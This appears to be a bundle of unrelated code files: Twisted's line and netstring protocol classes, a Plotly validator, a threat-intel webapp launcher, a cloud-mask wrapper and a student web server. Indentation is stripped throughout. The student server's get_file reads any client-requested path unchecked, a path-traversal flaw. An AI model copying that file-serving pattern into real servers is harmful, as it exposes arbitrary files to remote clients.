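# Illustrative usage sketch (kept as a comment: it requires an API key issued by
# the vindinium server):
#
#   bot = client()
#   bot.setKey('your-api-key')
#   bot.setParam('mode', 'training')
#   bot.startGame()
#   while not bot.game.finished:
#       bot.makeMove('North')  # replace with real decision logic
#   bot.close()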
|
the-stack_106_22123
|
import _plotly_utils.basevalidators
class ShowticksuffixValidator(_plotly_utils.basevalidators.EnumeratedValidator):
def __init__(
self, plotly_name="showticksuffix", parent_name="choropleth.colorbar", **kwargs
):
super(ShowticksuffixValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "colorbars"),
values=kwargs.pop("values", ["all", "first", "last", "none"]),
**kwargs,
)
|
the-stack_106_22126
|
# -*- test-case-name: twisted.test.test_protocols -*-
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Basic protocols, such as line-oriented, netstring, and int prefixed strings.
Maintainer: Itamar Shtull-Trauring
"""
# System imports
import re
import struct
import warnings
import cStringIO
import math
from zope.interface import implements
# Twisted imports
from twisted.internet import protocol, defer, interfaces, error
from twisted.python import log, deprecate, versions
LENGTH, DATA, COMMA = range(3)
NUMBER = re.compile('(\d*)(:?)')
deprecatedSince = versions.Version("Twisted", 10, 2, 0)
message = "NetstringReceiver parser state is private."
for attr in ["LENGTH", "DATA", "COMMA", "NUMBER"]:
deprecate.deprecatedModuleAttribute(
deprecatedSince, message, __name__, attr)
del deprecatedSince, message, attr
DEBUG = 0
class NetstringParseError(ValueError):
"""
The incoming data is not in valid Netstring format.
"""
class IncompleteNetstring(Exception):
"""
Not enough data to complete a netstring.
"""
class NetstringReceiver(protocol.Protocol):
"""
A protocol that sends and receives netstrings.
See U{http://cr.yp.to/proto/netstrings.txt} for the specification of
netstrings. Every netstring starts with digits that specify the length
of the data. This length specification is separated from the data by
a colon. The data is terminated with a comma.
Override L{stringReceived} to handle received netstrings. This
method is called with the netstring payload as a single argument
whenever a complete netstring is received.
Security features:
1. Messages are limited in size, useful if you don't want
someone sending you a 500MB netstring (change C{self.MAX_LENGTH}
to the maximum length you wish to accept).
2. The connection is lost if an illegal message is received.
@ivar MAX_LENGTH: Defines the maximum length of netstrings that can be
received.
@type MAX_LENGTH: C{int}
@ivar _LENGTH: A pattern describing all strings that contain a netstring
length specification. Examples for length specifications are '0:',
'12:', and '179:'. '007:' is no valid length specification, since
leading zeros are not allowed.
@type _LENGTH: C{re.Match}
@ivar _LENGTH_PREFIX: A pattern describing all strings that contain
the first part of a netstring length specification (without the
trailing comma). Examples are '0', '12', and '179'. '007' does not
start a netstring length specification, since leading zeros are
not allowed.
@type _LENGTH_PREFIX: C{re.Match}
@ivar _PARSING_LENGTH: Indicates that the C{NetstringReceiver} is in
the state of parsing the length portion of a netstring.
@type _PARSING_LENGTH: C{int}
@ivar _PARSING_PAYLOAD: Indicates that the C{NetstringReceiver} is in
the state of parsing the payload portion (data and trailing comma)
of a netstring.
@type _PARSING_PAYLOAD: C{int}
@ivar brokenPeer: Indicates if the connection is still functional
@type brokenPeer: C{int}
@ivar _state: Indicates if the protocol is consuming the length portion
(C{PARSING_LENGTH}) or the payload (C{PARSING_PAYLOAD}) of a netstring
@type _state: C{int}
@ivar _remainingData: Holds the chunk of data that has not yet been consumed
@type _remainingData: C{string}
@ivar _payload: Holds the payload portion of a netstring including the
trailing comma
@type _payload: C{cStringIO.StringIO}
@ivar _expectedPayloadSize: Holds the payload size plus one for the trailing
comma.
@type _expectedPayloadSize: C{int}
"""
MAX_LENGTH = 99999
_LENGTH = re.compile('(0|[1-9]\d*)(:)')
_LENGTH_PREFIX = re.compile('(0|[1-9]\d*)$')
# Some error information for NetstringParseError instances.
_MISSING_LENGTH = ("The received netstring does not start with a "
"length specification.")
_OVERFLOW = ("The length specification of the received netstring "
"cannot be represented in Python - it causes an "
"OverflowError!")
_TOO_LONG = ("The received netstring is longer than the maximum %s "
"specified by self.MAX_LENGTH")
_MISSING_COMMA = "The received netstring is not terminated by a comma."
_DATA_SUPPORT_DEPRECATED = ("Data passed to sendString() must be a string. "
"Non-string support is deprecated since "
"Twisted 10.0")
# The following constants are used for determining if the NetstringReceiver
# is parsing the length portion of a netstring, or the payload.
_PARSING_LENGTH, _PARSING_PAYLOAD = range(2)
def makeConnection(self, transport):
"""
Initializes the protocol.
"""
protocol.Protocol.makeConnection(self, transport)
self._remainingData = ""
self._currentPayloadSize = 0
self._payload = cStringIO.StringIO()
self._state = self._PARSING_LENGTH
self._expectedPayloadSize = 0
self.brokenPeer = 0
def sendString(self, string):
"""
Sends a netstring.
Wraps up C{string} by adding length information and a
trailing comma; writes the result to the transport.
@param string: The string to send. The necessary framing (length
prefix, etc) will be added.
@type string: C{str}
"""
if not isinstance(string, str):
warnings.warn(self._DATA_SUPPORT_DEPRECATED, DeprecationWarning, 2)
string = str(string)
self.transport.write('%d:%s,' % (len(string), string))
def dataReceived(self, data):
"""
Receives some characters of a netstring.
Whenever a complete netstring is received, this method extracts
its payload and calls L{stringReceived} to process it.
@param data: A chunk of data representing a (possibly partial)
netstring
@type data: C{str}
"""
self._remainingData += data
while self._remainingData:
try:
self._consumeData()
except IncompleteNetstring:
break
except NetstringParseError:
self._handleParseError()
break
def stringReceived(self, string):
"""
Override this for notification when each complete string is received.
@param string: The complete string which was received with all
framing (length prefix, etc) removed.
@type string: C{str}
@raise NotImplementedError: because the method has to be implemented
by the child class.
"""
raise NotImplementedError()
def _maxLengthSize(self):
"""
Calculate and return the string size of C{self.MAX_LENGTH}.
@return: The size of the string representation for C{self.MAX_LENGTH}
@rtype: C{float}
"""
return math.ceil(math.log10(self.MAX_LENGTH)) + 1
def _consumeData(self):
"""
Consumes the content of C{self._remainingData}.
@raise IncompleteNetstring: if C{self._remainingData} does not
contain enough data to complete the current netstring.
@raise NetstringParseError: if the received data do not
form a valid netstring.
"""
if self._state == self._PARSING_LENGTH:
self._consumeLength()
self._prepareForPayloadConsumption()
if self._state == self._PARSING_PAYLOAD:
self._consumePayload()
def _consumeLength(self):
"""
Consumes the length portion of C{self._remainingData}.
@raise IncompleteNetstring: if C{self._remainingData} contains
a partial length specification (digits without trailing
comma).
@raise NetstringParseError: if the received data do not form a valid
netstring.
"""
lengthMatch = self._LENGTH.match(self._remainingData)
if not lengthMatch:
self._checkPartialLengthSpecification()
raise IncompleteNetstring()
self._processLength(lengthMatch)
def _checkPartialLengthSpecification(self):
"""
Makes sure that the received data represents a valid number.
Checks if C{self._remainingData} represents a number smaller or
equal to C{self.MAX_LENGTH}.
@raise NetstringParseError: if C{self._remainingData} is no
number or is too big (checked by L{extractLength}).
"""
partialLengthMatch = self._LENGTH_PREFIX.match(self._remainingData)
if not partialLengthMatch:
raise NetstringParseError(self._MISSING_LENGTH)
lengthSpecification = (partialLengthMatch.group(1))
self._extractLength(lengthSpecification)
def _processLength(self, lengthMatch):
"""
Processes the length definition of a netstring.
Extracts and stores in C{self._expectedPayloadSize} the number
representing the netstring size. Removes the prefix
representing the length specification from
C{self._remainingData}.
@raise NetstringParseError: if the received netstring does not
start with a number or the number is bigger than
C{self.MAX_LENGTH}.
@param lengthMatch: A regular expression match object matching
a netstring length specification
@type lengthMatch: C{re.Match}
"""
endOfNumber = lengthMatch.end(1)
startOfData = lengthMatch.end(2)
lengthString = self._remainingData[:endOfNumber]
# Expect payload plus trailing comma:
self._expectedPayloadSize = self._extractLength(lengthString) + 1
self._remainingData = self._remainingData[startOfData:]
def _extractLength(self, lengthAsString):
"""
Attempts to extract the length information of a netstring.
@raise NetstringParseError: if the number is bigger than
C{self.MAX_LENGTH}.
@param lengthAsString: A chunk of data starting with a length
specification
@type lengthAsString: C{str}
@return: The length of the netstring
@rtype: C{int}
"""
self._checkStringSize(lengthAsString)
length = int(lengthAsString)
if length > self.MAX_LENGTH:
raise NetstringParseError(self._TOO_LONG % (self.MAX_LENGTH,))
return length
def _checkStringSize(self, lengthAsString):
"""
Checks the sanity of lengthAsString.
Checks if the size of the length specification exceeds the
size of the string representing self.MAX_LENGTH. If this is
not the case, the number represented by lengthAsString is
certainly bigger than self.MAX_LENGTH, and a
NetstringParseError can be raised.
This method should make sure that netstrings with extremely
long length specifications are refused before even attempting
to convert them to an integer (which might trigger a
MemoryError).
"""
if len(lengthAsString) > self._maxLengthSize():
raise NetstringParseError(self._TOO_LONG % (self.MAX_LENGTH,))
def _prepareForPayloadConsumption(self):
"""
Sets up variables necessary for consuming the payload of a netstring.
"""
self._state = self._PARSING_PAYLOAD
self._currentPayloadSize = 0
self._payload.seek(0)
self._payload.truncate()
def _consumePayload(self):
"""
Consumes the payload portion of C{self._remainingData}.
If the payload is complete, checks for the trailing comma and
processes the payload. If not, raises an L{IncompleteNetstring}
exception.
@raise IncompleteNetstring: if the payload received so far
contains fewer characters than expected.
@raise NetstringParseError: if the payload does not end with a
comma.
"""
self._extractPayload()
if self._currentPayloadSize < self._expectedPayloadSize:
raise IncompleteNetstring()
self._checkForTrailingComma()
self._state = self._PARSING_LENGTH
self._processPayload()
def _extractPayload(self):
"""
Extracts payload information from C{self._remainingData}.
Splits C{self._remainingData} at the end of the netstring. The
first part becomes C{self._payload}, the second part is stored
in C{self._remainingData}.
If the netstring is not yet complete, the whole content of
C{self._remainingData} is moved to C{self._payload}.
"""
if self._payloadComplete():
remainingPayloadSize = (self._expectedPayloadSize -
self._currentPayloadSize)
self._payload.write(self._remainingData[:remainingPayloadSize])
self._remainingData = self._remainingData[remainingPayloadSize:]
self._currentPayloadSize = self._expectedPayloadSize
else:
self._payload.write(self._remainingData)
self._currentPayloadSize += len(self._remainingData)
self._remainingData = ""
def _payloadComplete(self):
"""
Checks if enough data have been received to complete the netstring.
@return: C{True} iff the received data contain at least as many
characters as specified in the length section of the
netstring
@rtype: C{bool}
"""
return (len(self._remainingData) + self._currentPayloadSize >=
self._expectedPayloadSize)
def _processPayload(self):
"""
Processes the actual payload with L{stringReceived}.
Strips C{self._payload} of the trailing comma and calls
L{stringReceived} with the result.
"""
self.stringReceived(self._payload.getvalue()[:-1])
def _checkForTrailingComma(self):
"""
Checks if the netstring has a trailing comma at the expected position.
@raise NetstringParseError: if the last payload character is
anything but a comma.
"""
if self._payload.getvalue()[-1] != ",":
raise NetstringParseError(self._MISSING_COMMA)
def _handleParseError(self):
"""
Terminates the connection and sets the flag C{self.brokenPeer}.
"""
self.transport.loseConnection()
self.brokenPeer = 1
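# Illustrative sketch (not part of Twisted itself): a minimal NetstringReceiver
# subclass only needs to override stringReceived, e.g. to echo each complete
# netstring back to the peer:
#
#   class EchoNetstring(NetstringReceiver):
#       def stringReceived(self, string):
#           self.sendString(string)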
class LineOnlyReceiver(protocol.Protocol):
"""
A protocol that receives only lines.
This is purely a speed optimisation over LineReceiver, for the
cases that raw mode is known to be unnecessary.
@cvar delimiter: The line-ending delimiter to use. By default this is
'\\r\\n'.
@cvar MAX_LENGTH: The maximum length of a line to allow (If a
sent line is longer than this, the connection is dropped).
Default is 16384.
"""
_buffer = ''
delimiter = '\r\n'
MAX_LENGTH = 16384
def dataReceived(self, data):
"""
Translates bytes into lines, and calls lineReceived.
"""
lines = (self._buffer+data).split(self.delimiter)
self._buffer = lines.pop(-1)
for line in lines:
if self.transport.disconnecting:
# this is necessary because the transport may be told to lose
# the connection by a line within a larger packet, and it is
# important to disregard all the lines in that packet following
# the one that told it to close.
return
if len(line) > self.MAX_LENGTH:
return self.lineLengthExceeded(line)
else:
self.lineReceived(line)
if len(self._buffer) > self.MAX_LENGTH:
return self.lineLengthExceeded(self._buffer)
def lineReceived(self, line):
"""
Override this for when each line is received.
@param line: The line which was received with the delimiter removed.
@type line: C{str}
"""
raise NotImplementedError
def sendLine(self, line):
"""
Sends a line to the other end of the connection.
@param line: The line to send, not including the delimiter.
@type line: C{str}
"""
return self.transport.writeSequence((line, self.delimiter))
def lineLengthExceeded(self, line):
"""
Called when the maximum line length has been reached.
Override if it needs to be dealt with in some special way.
"""
return error.ConnectionLost('Line length exceeded')
class _PauseableMixin:
paused = False
def pauseProducing(self):
self.paused = True
self.transport.pauseProducing()
def resumeProducing(self):
self.paused = False
self.transport.resumeProducing()
self.dataReceived('')
def stopProducing(self):
self.paused = True
self.transport.stopProducing()
class LineReceiver(protocol.Protocol, _PauseableMixin):
"""
A protocol that receives lines and/or raw data, depending on mode.
In line mode, each line that's received becomes a callback to
L{lineReceived}. In raw data mode, each chunk of raw data becomes a
callback to L{rawDataReceived}. The L{setLineMode} and L{setRawMode}
methods switch between the two modes.
This is useful for line-oriented protocols such as IRC, HTTP, POP, etc.
@cvar delimiter: The line-ending delimiter to use. By default this is
'\\r\\n'.
@cvar MAX_LENGTH: The maximum length of a line to allow (If a
sent line is longer than this, the connection is dropped).
Default is 16384.
"""
line_mode = 1
__buffer = ''
delimiter = '\r\n'
MAX_LENGTH = 16384
def clearLineBuffer(self):
"""
Clear buffered data.
@return: All of the cleared buffered data.
@rtype: C{str}
"""
b = self.__buffer
self.__buffer = ""
return b
def dataReceived(self, data):
"""
Protocol.dataReceived.
Translates bytes into lines, and calls lineReceived (or
rawDataReceived, depending on mode.)
"""
self.__buffer = self.__buffer+data
while self.line_mode and not self.paused:
try:
line, self.__buffer = self.__buffer.split(self.delimiter, 1)
except ValueError:
if len(self.__buffer) > self.MAX_LENGTH:
line, self.__buffer = self.__buffer, ''
return self.lineLengthExceeded(line)
break
else:
linelength = len(line)
if linelength > self.MAX_LENGTH:
exceeded = line + self.__buffer
self.__buffer = ''
return self.lineLengthExceeded(exceeded)
why = self.lineReceived(line)
if why or self.transport and self.transport.disconnecting:
return why
else:
if not self.paused:
data=self.__buffer
self.__buffer=''
if data:
return self.rawDataReceived(data)
def setLineMode(self, extra=''):
"""
Sets the line-mode of this receiver.
If you are calling this from a rawDataReceived callback,
you can pass in extra unhandled data, and that data will
be parsed for lines. Further data received will be sent
to lineReceived rather than rawDataReceived.
Do not pass extra data if calling this function from
within a lineReceived callback.
"""
self.line_mode = 1
if extra:
return self.dataReceived(extra)
def setRawMode(self):
"""
Sets the raw mode of this receiver.
Further data received will be sent to rawDataReceived rather
than lineReceived.
"""
self.line_mode = 0
def rawDataReceived(self, data):
"""
Override this for when raw data is received.
"""
raise NotImplementedError
def lineReceived(self, line):
"""
Override this for when each line is received.
@param line: The line which was received with the delimiter removed.
@type line: C{str}
"""
raise NotImplementedError
def sendLine(self, line):
"""
Sends a line to the other end of the connection.
@param line: The line to send, not including the delimiter.
@type line: C{str}
"""
return self.transport.write(line + self.delimiter)
def lineLengthExceeded(self, line):
"""
Called when the maximum line length has been reached.
Override if it needs to be dealt with in some special way.
The argument 'line' contains the remainder of the buffer, starting
with (at least some part) of the line which is too long. This may
be more than one line, or may be only the initial portion of the
line.
"""
return self.transport.loseConnection()
class StringTooLongError(AssertionError):
"""
Raised when trying to send a string too long for a length prefixed
protocol.
"""
class IntNStringReceiver(protocol.Protocol, _PauseableMixin):
"""
Generic class for length prefixed protocols.
    @ivar recvd: buffer holding received data when split.
@type recvd: C{str}
@ivar structFormat: format used for struct packing/unpacking. Define it in
subclass.
@type structFormat: C{str}
@ivar prefixLength: length of the prefix, in bytes. Define it in subclass,
using C{struct.calcsize(structFormat)}
@type prefixLength: C{int}
"""
MAX_LENGTH = 99999
recvd = ""
def stringReceived(self, string):
"""
Override this for notification when each complete string is received.
@param string: The complete string which was received with all
framing (length prefix, etc) removed.
@type string: C{str}
"""
raise NotImplementedError
def lengthLimitExceeded(self, length):
"""
Callback invoked when a length prefix greater than C{MAX_LENGTH} is
received. The default implementation disconnects the transport.
Override this.
@param length: The length prefix which was received.
@type length: C{int}
"""
self.transport.loseConnection()
def dataReceived(self, recd):
"""
Convert int prefixed strings into calls to stringReceived.
"""
self.recvd = self.recvd + recd
while len(self.recvd) >= self.prefixLength and not self.paused:
            length, = struct.unpack(
                self.structFormat, self.recvd[:self.prefixLength])
if length > self.MAX_LENGTH:
self.lengthLimitExceeded(length)
return
if len(self.recvd) < length + self.prefixLength:
break
packet = self.recvd[self.prefixLength:length + self.prefixLength]
self.recvd = self.recvd[length + self.prefixLength:]
self.stringReceived(packet)
def sendString(self, string):
"""
Send a prefixed string to the other end of the connection.
@param string: The string to send. The necessary framing (length
prefix, etc) will be added.
@type string: C{str}
"""
if len(string) >= 2 ** (8 * self.prefixLength):
raise StringTooLongError(
"Try to send %s bytes whereas maximum is %s" % (
len(string), 2 ** (8 * self.prefixLength)))
self.transport.write(
struct.pack(self.structFormat, len(string)) + string)
class Int32StringReceiver(IntNStringReceiver):
"""
A receiver for int32-prefixed strings.
An int32 string is a string prefixed by 4 bytes, the 32-bit length of
the string encoded in network byte order.
This class publishes the same interface as NetstringReceiver.
"""
structFormat = "!I"
prefixLength = struct.calcsize(structFormat)
class Int16StringReceiver(IntNStringReceiver):
"""
A receiver for int16-prefixed strings.
An int16 string is a string prefixed by 2 bytes, the 16-bit length of
the string encoded in network byte order.
This class publishes the same interface as NetstringReceiver.
"""
structFormat = "!H"
prefixLength = struct.calcsize(structFormat)
class Int8StringReceiver(IntNStringReceiver):
"""
A receiver for int8-prefixed strings.
An int8 string is a string prefixed by 1 byte, the 8-bit length of
the string.
This class publishes the same interface as NetstringReceiver.
"""
structFormat = "!B"
prefixLength = struct.calcsize(structFormat)
class StatefulStringProtocol:
"""
A stateful string protocol.
This is a mixin for string protocols (Int32StringReceiver,
NetstringReceiver) which translates stringReceived into a callback
(prefixed with 'proto_') depending on state.
The state 'done' is special; if a proto_* method returns it, the
connection will be closed immediately.
"""
state = 'init'
def stringReceived(self, string):
"""
Choose a protocol phase function and call it.
Call back to the appropriate protocol phase; this begins with
the function proto_init and moves on to proto_* depending on
what each proto_* function returns. (For example, if
self.proto_init returns 'foo', then self.proto_foo will be the
next function called when a protocol message is received.
"""
try:
pto = 'proto_'+self.state
statehandler = getattr(self,pto)
except AttributeError:
log.msg('callback',self.state,'not found')
else:
self.state = statehandler(string)
if self.state == 'done':
self.transport.loseConnection()
class FileSender:
"""
A producer that sends the contents of a file to a consumer.
This is a helper for protocols that, at some point, will take a
file-like object, read its contents, and write them out to the network,
optionally performing some transformation on the bytes in between.
"""
implements(interfaces.IProducer)
CHUNK_SIZE = 2 ** 14
lastSent = ''
deferred = None
def beginFileTransfer(self, file, consumer, transform = None):
"""
Begin transferring a file
@type file: Any file-like object
@param file: The file object to read data from
@type consumer: Any implementor of IConsumer
@param consumer: The object to write data to
@param transform: A callable taking one string argument and returning
the same. All bytes read from the file are passed through this before
being written to the consumer.
@rtype: C{Deferred}
@return: A deferred whose callback will be invoked when the file has
been completely written to the consumer. The last byte written to the
consumer is passed to the callback.
"""
self.file = file
self.consumer = consumer
self.transform = transform
self.deferred = deferred = defer.Deferred()
self.consumer.registerProducer(self, False)
return deferred
def resumeProducing(self):
chunk = ''
if self.file:
chunk = self.file.read(self.CHUNK_SIZE)
if not chunk:
self.file = None
self.consumer.unregisterProducer()
if self.deferred:
self.deferred.callback(self.lastSent)
self.deferred = None
return
if self.transform:
chunk = self.transform(chunk)
self.consumer.write(chunk)
self.lastSent = chunk[-1]
def pauseProducing(self):
pass
def stopProducing(self):
if self.deferred:
self.deferred.errback(
Exception("Consumer asked us to stop producing"))
self.deferred = None
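# --- Usage sketch (not part of the original module) ---------------------------
# A minimal protocol built on the LineReceiver defined above: it echoes each
# received line back and drops the connection on a hypothetical "quit" command.
# Purely illustrative; nothing below is referenced elsewhere in this module.
class _EchoLineDemo(LineReceiver):
    def lineReceived(self, line):
        # "quit" is an illustrative command, not part of Twisted itself.
        if line == 'quit':
            self.transport.loseConnection()
        else:
            self.sendLine(line)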
|
the-stack_106_22129
|
from __future__ import absolute_import, print_function
from wagl.acca_cloud_masking import majority_filter
from . import fmask_cloud_masking as _fmask
def fmask_cloud_mask(
mtl, null_mask=None, cloud_prob=None, wclr_max=None, sat_tag=None, aux_data=None
):
Lnum = int(sat_tag[-1:])
(_, _, _, _, _, _, _, _, fmask_byte, _, _, _, _, _, _, _) = _fmask.plcloud(
filename=mtl, mask=null_mask, num_Lst=Lnum, aux_data=aux_data or {}
)
    # Convert to bool: True = cloud, False = not cloud
fmask_byte = fmask_byte == 1
    # Use a majority filter to fill holes; 2 iterations work well to smooth
    # things over
fmask_byte = majority_filter(array=fmask_byte, iterations=2)
return ~fmask_byte # Invert
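# Usage sketch (illustrative only): the MTL path, valid-pixel mask and satellite
# tag below are hypothetical. Note the final inversion above: the returned mask
# is True where a pixel is NOT flagged as cloud.
#
# clear_mask = fmask_cloud_mask('LC08_L1TP_092084_MTL.txt', null_mask=valid_pixels,
#                               sat_tag='LANDSAT_8')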
|
the-stack_106_22130
|
# NOTICE: As required by the Apache License v2.0, this notice is to state this file has been modified by Arachne Digital
# This file has been renamed from `tram.py`
# To see its full history, please use `git log --follow <filename>` to view previous commits and additional contributors
import aiohttp_jinja2
import asyncio
import argparse
import jinja2
import logging
import os
import sys
import yaml
from aiohttp import web
from threadcomponents.database.dao import Dao, DB_POSTGRESQL, DB_SQLITE
from threadcomponents.handlers.web_api import WebAPI
from threadcomponents.service.data_svc import DataService
from threadcomponents.service.ml_svc import MLService
from threadcomponents.service.reg_svc import RegService
from threadcomponents.service.rest_svc import RestService
from threadcomponents.service.web_svc import WebService
# If calling Thread from outside the project directory, then we need to specify
# a directory prefix (e.g. when Thread is a subdirectory)
dir_prefix = ''
# The types of sources for building the database
ONLINE_BUILD_SOURCE = 'taxii-server'
OFFLINE_BUILD_SOURCE = 'local-json'
async def background_tasks(taxii_local=ONLINE_BUILD_SOURCE, build=False, json_file=None):
"""
Function to run background tasks at startup
    :param taxii_local: Expects ONLINE_BUILD_SOURCE ('taxii-server') or OFFLINE_BUILD_SOURCE ('local-json') to specify the build type.
:param build: Defines whether or not a new database will be rebuilt
:param json_file: Expects a path to the enterprise attack json if the 'json' build method is called.
:return: nil
"""
if build:
await data_svc.reload_database()
if taxii_local == ONLINE_BUILD_SOURCE:
try:
await data_svc.insert_attack_stix_data()
except Exception as exc:
logging.critical('!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n'
'COULD NOT CONNECT TO TAXII SERVERS: {}\nPLEASE UTILIZE THE OFFLINE CAPABILITY FLAG '
'"-FF" FOR OFFLINE DATABASE BUILDING\n'
'!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!'.format(exc))
sys.exit()
elif taxii_local == OFFLINE_BUILD_SOURCE and json_file:
await data_svc.insert_attack_json_data(json_file)
async def init(host, port, app_setup_func=None):
"""
Function to initialize the aiohttp app
:param host: Address to reach webserver on
:param port: Port to listen on
:param app_setup_func: Optional, a function that applies extra config to the app
:return: nil
"""
# Run any required functions before the app is launched
await website_handler.pre_launch_init()
logging.info('server starting: %s:%s' % (host, port))
webapp_dir = os.path.join(dir_prefix, 'webapp')
logging.info('webapp dir is %s' % webapp_dir)
app = web.Application(middlewares=[WebAPI.req_handler])
app.router.add_route('GET', web_svc.get_route(WebService.HOME_KEY), website_handler.index)
app.router.add_route('GET', web_svc.get_route(WebService.EDIT_KEY), website_handler.edit)
app.router.add_route('GET', web_svc.get_route(WebService.ABOUT_KEY), website_handler.about)
app.router.add_route('*', web_svc.get_route(WebService.REST_KEY), website_handler.rest_api)
app.router.add_route('GET', web_svc.get_route(WebService.EXPORT_PDF_KEY), website_handler.pdf_export)
app.router.add_route('GET', web_svc.get_route(WebService.EXPORT_NAV_KEY), website_handler.nav_export)
app.router.add_route('GET', web_svc.get_route(WebService.COOKIE_KEY), website_handler.accept_cookies)
app.router.add_static(web_svc.get_route(WebService.STATIC_KEY), os.path.join(webapp_dir, 'theme'))
# If extra app-setup is required, do this
if callable(app_setup_func):
app_setup_func(app)
aiohttp_jinja2.setup(app, loader=jinja2.FileSystemLoader(os.path.join(webapp_dir, 'html')))
runner = web.AppRunner(app)
await runner.setup()
await web.TCPSite(runner, host, port).start()
# First action after app-initialisation is to resume any reports left in the queue from a previous session
await rest_svc.check_queue()
def start(host, port, taxii_local=ONLINE_BUILD_SOURCE, build=False, json_file=None, app_setup_func=None):
"""
Main function to start app
:param host: Address to reach webserver on
:param port: Port to listen on
    :param taxii_local: Expects the online ('taxii-server') or offline ('local-json') build source to specify the build type
:param build: Defines whether or not a new database will be rebuilt
:param json_file: Expects a path to the enterprise attack json if the 'offline' build method is called
:param app_setup_func: Optional, a function that applies extra config to the app
:return: nil
"""
loop = asyncio.get_event_loop()
loop.create_task(background_tasks(taxii_local=taxii_local, build=build, json_file=json_file))
loop.run_until_complete(init(host, port, app_setup_func=app_setup_func))
try:
loop.run_forever()
except KeyboardInterrupt:
pass
def main(directory_prefix='', route_prefix=None, app_setup_func=None):
global data_svc, dir_prefix, ml_svc, rest_svc, web_svc, website_handler
dir_prefix = directory_prefix
logging.getLogger().setLevel(logging.INFO)
logging.info('Welcome to Thread')
# Read from config
with open(os.path.join(dir_prefix, 'threadcomponents', 'conf', 'config.yml')) as c:
config = yaml.safe_load(c)
is_local = config.get('run-local', True)
db_conf = config.get('db-engine', DB_SQLITE)
conf_build = config.get('build', True)
host = config.get('host', '0.0.0.0')
port = config.get('port', 9999)
taxii_local = config.get('taxii-local', 'taxii-server')
js_src = config.get('js-libraries', 'js-online-src')
max_tasks = config.get('max-analysis-tasks', 1)
queue_limit = config.get('queue_limit', 0)
json_file = config.get('json_file', None)
json_file_path = os.path.join(dir_prefix, 'threadcomponents', 'models', json_file) if json_file else None
attack_dict = None
# Set the attack dictionary filepath if applicable
if conf_build and taxii_local == OFFLINE_BUILD_SOURCE and json_file_path and os.path.isfile(json_file_path):
logging.info('Will build model from static file')
attack_dict = os.path.abspath(json_file_path)
# Check int parameters are ints
int_error = '%s config set incorrectly: expected a number'
try:
if queue_limit < 1:
queue_limit = None
except TypeError:
raise ValueError(int_error % 'queue_limit')
try:
max_tasks = max(1, max_tasks)
except TypeError:
raise ValueError(int_error % 'max-analysis-tasks')
try:
int(port)
except ValueError:
raise ValueError(int_error % 'port')
# Determine DB engine to use
db_obj = None
if db_conf == DB_SQLITE:
from threadcomponents.database.thread_sqlite3 import ThreadSQLite
db_obj = ThreadSQLite(os.path.join(dir_prefix, 'threadcomponents', 'database', 'thread.db'))
elif db_conf == DB_POSTGRESQL:
# Import here to avoid PostgreSQL requirements needed for non-PostgreSQL use
from threadcomponents.database.thread_postgresql import ThreadPostgreSQL
db_obj = ThreadPostgreSQL()
# Initialise DAO, start services and initiate main function
dao = Dao(engine=db_obj)
web_svc = WebService(route_prefix=route_prefix, is_local=is_local)
reg_svc = RegService(dao=dao)
data_svc = DataService(dao=dao, web_svc=web_svc, dir_prefix=dir_prefix)
ml_svc = MLService(web_svc=web_svc, dao=dao, dir_prefix=dir_prefix)
rest_svc = RestService(web_svc, reg_svc, data_svc, ml_svc, dao, dir_prefix=dir_prefix, queue_limit=queue_limit,
max_tasks=max_tasks)
services = dict(dao=dao, data_svc=data_svc, ml_svc=ml_svc, reg_svc=reg_svc, web_svc=web_svc, rest_svc=rest_svc)
website_handler = WebAPI(services=services, js_src=js_src)
start(host, port, taxii_local=taxii_local, build=conf_build, json_file=attack_dict, app_setup_func=app_setup_func)
if __name__ == '__main__':
# Help information for the program
parser = argparse.ArgumentParser(description='Launch the Thread webapp.')
parser.add_argument('--build-db', action='store_true', help='builds the (PostgreSQL) database')
parser.add_argument('--schema', help='the schema file to use if --build-db option is used')
args = vars(parser.parse_args())
if args.get('build_db'):
schema = args.get('schema')
# Import here to avoid PostgreSQL requirements needed for non-PostgreSQL use
from threadcomponents.database.thread_postgresql import build_db as build_postgresql
build_postgresql() if schema is None else build_postgresql(schema)
else:
main()
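# Usage sketch (illustrative only): embedding Thread in a parent project where it
# lives in a "thread/" subdirectory. The route prefix and setup function below
# are hypothetical.
#
# def add_extra_routes(app):
#     app.router.add_static('/docs', 'docs')
#
# main(directory_prefix='thread', route_prefix='/thread', app_setup_func=add_extra_routes)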
|
the-stack_106_22131
|
'''
CSCI 379 Programming Assignment 2
By Antonina Serdyukova
With the help of this tutorial https://ruslanspivak.com/lsbaws-part3/
'''
import errno
import os
import sys
import signal
import socket
import datetime
import time
if len(sys.argv) > 1:
p = int(sys.argv[1])
else:
p = 80
SERVER_ADDRESS = (HOST, PORT) = '', p
REQUEST_QUEUE_SIZE = 1024
def grim_reaper(signum, frame):
while True:
try:
pid, status = os.waitpid(
-1, # Wait for any child process
os.WNOHANG # Do not block and return EWOULDBLOCK error
)
except OSError:
return
if pid == 0: # no more zombies
return
def get_file(path, br_type, sys_type):
try:
path = path[1:]
f = open(path,'r')
l = f.read(1024)
data = ''
while (l):
data += l
l = f.read(1024)
f.close()
data = data.replace('index.html"', path + '" from ' + br_type + ' running on ' + sys_type)
return data
except FileNotFoundError:
f = open('404.html','r')
l = f.read(1024)
data = ''
while (l):
data += l
l = f.read(1024)
f.close()
return data
def map_os(line):
os_list = [
'Windows 3.11',
'Windows 95',
'Windows 98',
'Windows 2000',
'Windows XP',
'Windows Server 2003',
'Windows Vista',
'Windows 7',
'Windows 8',
'Windows 10',
'Windows NT 4.0',
'Windows ME',
'Open BSD',
'Sun OS',
'Linux',
'Mac OS',
'QNX',
'BeOS',
'OS/2',
'Search Bot'
]
ua_list = [
['Win16'],
['Windows 95','Win95','Windows_95'],
['Windows 98','Win98'],
['Windows NT 5.0','Windows 2000'],
['Windows NT 5.1','Windows XP'],
['Windows NT 5.2'],
['Windows NT 6.0'],
['Windows NT 6.1'],
['Windows NT 6.2'],
['Windows NT 10.0'],
['Windows NT 4.0','WinNT4.0','WinNT','Windows NT'],
['Windows ME'],
['OpenBSD'],
['SunOS'],
['Linux','X11'],
